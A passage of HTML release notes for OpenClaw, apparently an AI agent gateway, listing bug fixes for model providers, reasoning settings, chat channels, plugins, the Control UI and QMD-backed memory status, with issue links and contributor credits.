<li>Providers/OpenRouter: remove retired Hunter Alpha and Healer Alpha static catalog rows and disable proxy reasoning injection for stale Hunter Alpha configs, so replies are not hidden when OpenRouter returns answer text in reasoning fields. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4063678295" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/43942" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/43942/hovercard" href="https://github.com/openclaw/openclaw/issues/43942">#43942</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/EvanDataForge/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/EvanDataForge">@EvanDataForge</a>.</li>
<li>Providers/reasoning: let Groq and LM Studio declare provider-native reasoning effort values, so Qwen thinking models receive <code>none</code>/<code>default</code> or <code>off</code>/<code>on</code> instead of OpenAI-only <code>low</code>/<code>medium</code> values. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4014930127" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/32638" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/32638/hovercard" href="https://github.com/openclaw/openclaw/issues/32638">#32638</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Aqu1bp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Aqu1bp">@Aqu1bp</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mgoulart/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mgoulart">@mgoulart</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Norpps/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Norpps">@Norpps</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BSTail/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BSTail">@BSTail</a>.</li>
<li>Local models: default custom providers with only <code>baseUrl</code> to the Chat Completions adapter and trust loopback model requests automatically, so local OpenAI-compatible proxies receive <code>/v1/chat/completions</code> without timing out. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4041547299" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/40024" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/40024/hovercard" href="https://github.com/openclaw/openclaw/issues/40024">#40024</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/parachuteshe/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/parachuteshe">@parachuteshe</a>.</li>
<li>Channels/message tool: surface Discord, Slack, and Mattermost <code>user:</code>/<code>channel:</code> target syntax in the shared message target schema and Discord ambiguity errors, so DM sends by numeric id stop burning retries before finding <code>user:&lt;id&gt;</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332209830" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72401" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72401/hovercard" href="https://github.com/openclaw/openclaw/issues/72401">#72401</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/garyd9/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/garyd9">@garyd9</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hclsys/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hclsys">@hclsys</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/praveen9354/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/praveen9354">@praveen9354</a>.</li>
<li>Agents/tools: scope tool-loop detection history to the active run when available, so scheduled heartbeat cycles no longer inherit stale repeated-call counts from previous runs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4041859005" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/40144" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/40144/hovercard" href="https://github.com/openclaw/openclaw/issues/40144">#40144</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mattbrown319/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mattbrown319">@mattbrown319</a>.</li>
<li>Agents/subagents: preserve requester delivery for completion announces across different channel accounts, keep same-channel thread completions routed to the child thread, and fail closed instead of guessing a child binding when requester conversation signal is missing. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sfuminya/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sfuminya">@sfuminya</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/suyua9/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/suyua9">@suyua9</a>.</li>
<li>Agents/status: persist the post-compaction token estimate from auto-compaction when providers omit usage metadata, so <code>/status</code> and session lists keep showing fresh context usage after compaction. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4275752212" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67667" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/67667/hovercard" href="https://github.com/openclaw/openclaw/issues/67667">#67667</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4336026319" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72822" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72822/hovercard" href="https://github.com/openclaw/openclaw/pull/72822">#72822</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Jimmy-xuzimo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Jimmy-xuzimo">@Jimmy-xuzimo</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/skylight-9/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/skylight-9">@skylight-9</a>.</li>
<li>Control UI: show loading, reload, and retry states when a lazy dashboard panel cannot load after an upgrade, so the Logs tab no longer appears blank on stale browser bundles. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332419371" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72450" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72450/hovercard" href="https://github.com/openclaw/openclaw/issues/72450">#72450</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sobergou/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sobergou">@sobergou</a>.</li>
<li>Gateway/plugins: start the Gateway in degraded mode when a single plugin entry has invalid schema config, and let <code>openclaw doctor --fix</code> quarantine that plugin config instead of crash-looping every channel. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4222538957" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62976" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/62976/hovercard" href="https://github.com/openclaw/openclaw/issues/62976">#62976</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4312236696" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70371" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70371/hovercard" href="https://github.com/openclaw/openclaw/issues/70371">#70371</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Doraemon-Claw/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Doraemon-Claw">@Doraemon-Claw</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pksidekyk/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pksidekyk">@pksidekyk</a>.</li>
<li>Agents/plugins: skip malformed plugin tools with missing schema objects and report plugin diagnostics, so one broken tool no longer crashes Anthropic agent runs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4297771760" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69423" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69423/hovercard" href="https://github.com/openclaw/openclaw/issues/69423">#69423</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jmnickels/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jmnickels">@jmnickels</a>.</li>
<li>Agents/reasoning: recover fully wrapped unclosed <code>&lt;think&gt;</code> replies that would otherwise sanitize to empty text while keeping strict stripping for closed reasoning blocks and unclosed tails after visible text. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4033641320" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/37696" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/37696/hovercard" href="https://github.com/openclaw/openclaw/issues/37696">#37696</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4114131932" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/51915" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/51915/hovercard" href="https://github.com/openclaw/openclaw/pull/51915">#51915</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/druide67/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/druide67">@druide67</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/okuyam2y/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/okuyam2y">@okuyam2y</a>.</li>
<li>Control UI/Gateway: bind WebChat handshakes to their active socket and reject post-close server registrations, so aborted connects no longer leave zombie clients or misleading duplicate WebSocket connection logs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4334957430" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72753" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72753/hovercard" href="https://github.com/openclaw/openclaw/issues/72753">#72753</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/LumenFromTheFuture/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/LumenFromTheFuture">@LumenFromTheFuture</a>.</li>
<li>Agents/fallback: split ambiguous provider failures into <code>empty_response</code>, <code>no_error_details</code>, and <code>unclassified</code>, and add flat fallback-step fields to structured fallback logs so primary-model failures stay visible when later fallbacks also fail. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329919349" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71922" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71922/hovercard" href="https://github.com/openclaw/openclaw/issues/71922">#71922</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329116597" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71744" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71744/hovercard" href="https://github.com/openclaw/openclaw/issues/71744">#71744</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/andyk-ms/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/andyk-ms">@andyk-ms</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/nikolaykazakovvs-ux/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/nikolaykazakovvs-ux">@nikolaykazakovvs-ux</a>.</li>
<li>Plugins/Windows: normalize Windows absolute paths before handing bundled plugin modules to Jiti, so Feishu/Lark message sending no longer fails with unsupported <code>c:</code> ESM loader URLs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4335348867" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72783" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72783/hovercard" href="https://github.com/openclaw/openclaw/issues/72783">#72783</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jackychen-png/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jackychen-png">@jackychen-png</a>.</li>
<li>CLI/doctor: run bundled plugin runtime-dependency repairs through the async npm installer with spinner/line progress and heartbeat updates, so long <code>openclaw doctor --fix</code> installs no longer look hung in TTY or piped output. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4335189382" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72775" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72775/hovercard" href="https://github.com/openclaw/openclaw/issues/72775">#72775</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dfpalhano/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dfpalhano">@dfpalhano</a>.</li>
<li>Feishu/Windows: normalize bundled channel sidecar loads before Jiti evaluates them, so Feishu outbound sends no longer fail with raw <code>C:</code> ESM loader errors on Windows. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4335348867" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72783" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72783/hovercard" href="https://github.com/openclaw/openclaw/issues/72783">#72783</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jackychen-png/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jackychen-png">@jackychen-png</a>.</li>
<li>Agents/tools: ignore volatile <code>exec</code> runtime metadata when comparing tool-loop outcomes, so enabled loop detection can stop repeated identical shell-command results instead of resetting on duration, PID, session, or cwd changes. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4022477859" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/34574" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/34574/hovercard" href="https://github.com/openclaw/openclaw/issues/34574">#34574</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4048349125" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/41502" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/41502/hovercard" href="https://github.com/openclaw/openclaw/pull/41502">#41502</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/gucasbrg/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/gucasbrg">@gucasbrg</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Zcg2021/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Zcg2021">@Zcg2021</a>.</li>
<li>Agents/fallback: classify internal live-session model switch conflicts as unknown fallback failures instead of provider overloads, preventing local vLLM endpoints from receiving misleading overloaded cooldowns. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4225856098" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63229" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63229/hovercard" href="https://github.com/openclaw/openclaw/issues/63229">#63229</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/clawdia-lobster/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/clawdia-lobster">@clawdia-lobster</a>.</li>
<li>Discord: let thread sessions inherit the parent channel's session-level <code>/model</code> override as a model-only fallback without enabling parent transcript inheritance. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4335010108" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72755" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72755/hovercard" href="https://github.com/openclaw/openclaw/issues/72755">#72755</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/solavrc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/solavrc">@solavrc</a>.</li>
<li>Gateway/plugins: skip stale configured channels whose matching plugin is no longer discoverable, point cleanup at <code>openclaw doctor --fix</code>, and keep unrelated channel typos fatal so one missing channel plugin no longer crash-loops the Gateway. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4124825809" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/53311" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/53311/hovercard" href="https://github.com/openclaw/openclaw/issues/53311">#53311</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/futhgar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/futhgar">@futhgar</a>.</li>
<li>Control UI: keep session-specific assistant identity loads authoritative after WebSocket connect, so non-main agent chat sessions do not show the main agent name in the header after bootstrap refreshes. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4335228084" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72776" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72776/hovercard" href="https://github.com/openclaw/openclaw/issues/72776">#72776</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rockytian-top/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rockytian-top">@rockytian-top</a>.</li>
<li>Agents/Qwen: preserve exact custom <code>modelstudio</code> provider configs with foreign <code>api</code> owners so explicit OpenAI-compatible Model Studio endpoints no longer get normalized into the bundled Qwen plugin path. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4241479558" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64483" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64483/hovercard" href="https://github.com/openclaw/openclaw/issues/64483">#64483</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/FiredMosquito831/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/FiredMosquito831">@FiredMosquito831</a>.</li>
<li>MCP/bundle-mcp: normalize CLI-native <code>type: "http"</code> MCP server entries to OpenClaw <code>transport: "streamable-http"</code> on save, repair existing configs with doctor, and keep embedded Pi from falling back to legacy SSE GET-first startup for those servers. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4335050401" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72757" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72757/hovercard" href="https://github.com/openclaw/openclaw/issues/72757">#72757</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Studioscale/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Studioscale">@Studioscale</a>.</li>
<li>OpenCode: expose Anthropic Opus/Sonnet 4.x thinking levels for proxied Claude models, so <code>/think xhigh</code>, <code>/think adaptive</code>, and <code>/think max</code> validate consistently with the direct Anthropic provider. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4334548834" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72729" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72729/hovercard" href="https://github.com/openclaw/openclaw/issues/72729">#72729</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/haishmg/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/haishmg">@haishmg</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/aaajiao/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/aaajiao">@aaajiao</a>.</li>
<li>Media-understanding/audio: migrate deprecated <code>{input}</code> placeholders in legacy <code>audio.transcription.command</code> configs to <code>{{MediaPath}}</code>, so custom audio transcribers no longer receive the literal placeholder after doctor repair. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4335120301" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72760" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72760/hovercard" href="https://github.com/openclaw/openclaw/issues/72760">#72760</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/krisfanue3-hash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/krisfanue3-hash">@krisfanue3-hash</a>.</li>
<li>Ollama/WSL2: warn when GPU-backed WSL2 installs combine CUDA visibility with an autostarting <code>ollama.service</code> using <code>Restart=always</code>, and document the systemd, <code>.wslconfig</code>, and keep-alive mitigation for crash loops. Carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4205722264" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61022" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/61022/hovercard" href="https://github.com/openclaw/openclaw/pull/61022">#61022</a>; fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4206448739" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61185" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/61185/hovercard" href="https://github.com/openclaw/openclaw/issues/61185">#61185</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/yhyatt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/yhyatt">@yhyatt</a>.</li>
<li>Ollama/onboarding: de-dupe suggested bare local models against installed <code>:latest</code> tags and skip redundant pulls, so setup shows the installed model once and no longer says it is downloading an already available model. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4290796328" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68952" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68952/hovercard" href="https://github.com/openclaw/openclaw/issues/68952">#68952</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/tleyden/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/tleyden">@tleyden</a>.</li>
<li>Memory-core/doctor: keep <code>doctor.memory.status</code> on the cached path by default and only run live embedding pings for explicit deep probes, preventing slow local embedding backends from blocking Gateway status checks. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4328026042" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71568" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71568/hovercard" href="https://github.com/openclaw/openclaw/issues/71568">#71568</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/apex-system/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/apex-system">@apex-system</a>.</li>
<li>Memory/QMD: group same-source collections into one QMD search invocation when the installed QMD supports multiple <code>-c</code> filters, while keeping older QMD builds on the per-collection fallback. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332566839" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72484" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72484/hovercard" href="https://github.com/openclaw/openclaw/issues/72484">#72484</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332567282" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72485" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72485/hovercard" href="https://github.com/openclaw/openclaw/pull/72485">#72485</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4300148574" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69583" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69583/hovercard" href="https://github.com/openclaw/openclaw/pull/69583">#69583</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BsnizND/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BsnizND">@BsnizND</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zeroaltitude/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zeroaltitude">@zeroaltitude</a>.</li>
<li>Memory/QMD: accept QMD status vector-count variants such as <code>Vectors = 42</code>, <code>Vectors:42</code>, and <code>Vectors: 42 embedded</code>, so <code>memory status --deep</code> no longer reports embeddings unavailable for healthy QMD wrappers. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4230927724" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63652" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63652/hovercard" href="https://github.com/openclaw/openclaw/issues/63652">#63652</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4231262054" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63678" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/63678/hovercard" href="https://github.com/openclaw/openclaw/pull/63678">#63678</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/apoapostolov/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/apoapostolov">@apoapostolov</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/WarrenJones/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/WarrenJones">@WarrenJones</a>.</li>
<li>Memory/QMD: skip QMD vector status probes and embedding maintenance in lexical <code>searchMode: "search"</code>, so BM25-only QMD setups on ARM do not trigger llama.cpp/Vulkan builds during status checks or embed cycles. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4189583069" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59234" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/59234/hovercard" href="https://github.com/openclaw/openclaw/issues/59234">#59234</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4267984707" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67113" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/67113/hovercard" href="https://github.com/openclaw/openclaw/issues/67113">#67113</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/PrinceOfEgypt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/PrinceOfEgypt">@PrinceOfEgypt</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Vksh07/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Vksh07">@Vksh07</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Snipe76/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Snipe76">@Snipe76</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/NomLom/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/NomLom">@NomLom</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/t4r3e2q1-commits/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/t4r3e2q1-commits">@t4r3e2q1-commits</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dmak/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dmak">@dmak</a>.</li>
<li>Memory/QMD: report the live watcher dirty state in memory status, so changed QMD-backed memory files show as dirty until the queued sync finishes. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4200061352" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60244" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/60244/hovercard" href="https://github.com/openclaw/openclaw/issues/60244">#60244</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/xinzf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xinzf">@xinzf</a>.</li>
<li>Compaction: skip oversized pre-compaction checkpoint snapshots and prune duplicate long user turns from compaction input and rotated successor transcripts, preventing retry storms from being preserved across checkpoint cycles. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4335315619" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72780" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72780/hovercard" href="https://github.com/openclaw/openclaw/issues/72780">#72780</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SweetSophia/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SweetSophia">@SweetSophia</a>.</li>
